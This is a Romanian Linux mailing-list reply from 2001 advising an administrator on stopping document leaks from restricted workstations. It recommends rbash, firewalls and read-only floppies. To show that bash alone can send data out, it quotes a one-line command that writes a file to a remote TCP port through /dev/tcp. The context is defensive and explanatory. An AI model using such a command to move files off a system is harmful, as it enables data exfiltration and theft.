On 4 Dec 2001, Dragos Popescu wrote:
> > Man, dar se poate face! Se poate aduce un biar, se poate compila unul... > Nu se egzista cpp, perl, php, whatever Tot ce poate fi facut in perl, poate fi facut si sub bash curat, cu exceptia chestiilor case sensitive pe stringuri. Pentru chestii case sensitive ai nevoie sa apelezi la programe externe. Stii ce face asta? cat fisier > /dev/tcp/192.168.0.1/25 Da un tcpdump si o sa fii surprins cam cat de multe se pot face dintr-un simplu bash. Pentru udp au nevoie de suid dar tcp-ul nu-l poti taia decat din firewall si/sau lids ca nu stii cand te trezesti cu client de mail sau browser facut in shell script :) Deci ce inseamna whatever? N-au nici shell? Sau ai un shell restrictionat in care n-au dreptul sa execute decat 2-3 comenzi supervizate? Cu un `tr' se implementeaza un rot13 sau ceva asemanator intr-o singura linie. In bash trebuie sa pui un while ca sa mearga. Pentru un uuencode pune vreo doua while-uri. Dar sculele de postscript sigur le ai odata ce dai acces la imprimanta. Stiai ca postscriptul este limbaj? Stiai ca s-a scris si craker de md5-uri pe el? (era un zapacit care voia sa puna si imprimanta la lucru ca nu-i ajungeau calculatoarele). Si nu te gandi ca lumea nu stie postscript. Eu nu stiu dar am avut angajata o fatuca acum vreo 5 ani care manarea in wordpad fisierele *.ps ca nu mergeau la imprimanta asa cum le scotea wordperfectul 5.1 (Iar o sa-mi sara Gusterul in cap ca toata lumea stie ca nu se iezista securitate da' io am spus aicea ce am spus ca poate mai dau si altii idei despre ce se poate face) > > Apropos, accesul la mail cum ie taiat? E greu de alterat documentul cumva > > ca tu sa nu iti mai poti da seama ce se trasfera? > Nu au mail, nu au www; daca stau si ma gandesc bine, vai de mama lor:) > Nu au decat monitor, acces la fisiere si, eventual, imprimanta. Si cam cat de mari sunt documentele alea? Nu se pot lista? In orice caz floapa trebuie scoasa sau in cel mai rau caz pusa read-only. Eu daca ar trebui sa am grija sa nu plece niste documente importante nu as risca rw. Si in nici un caz nu te gandi la shell-uri cu multe briz-briz-uri (bash, csh, zsh) ci mai degraba la un rbash sau un shell ciopartit in care sa nu aiba decat comenzile strict necesare. Strict necesare insemna ca daca dai din contul userului de doua ori tab sa nu-ti spuna cumva "Display all 2626 possibilities? (y or n)" :) Flower <sadic> si sigur nu aveti vre-un Jonny Mnemonic angajat in firma? :))) </sadic> --- Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to unsubscribe from this list.
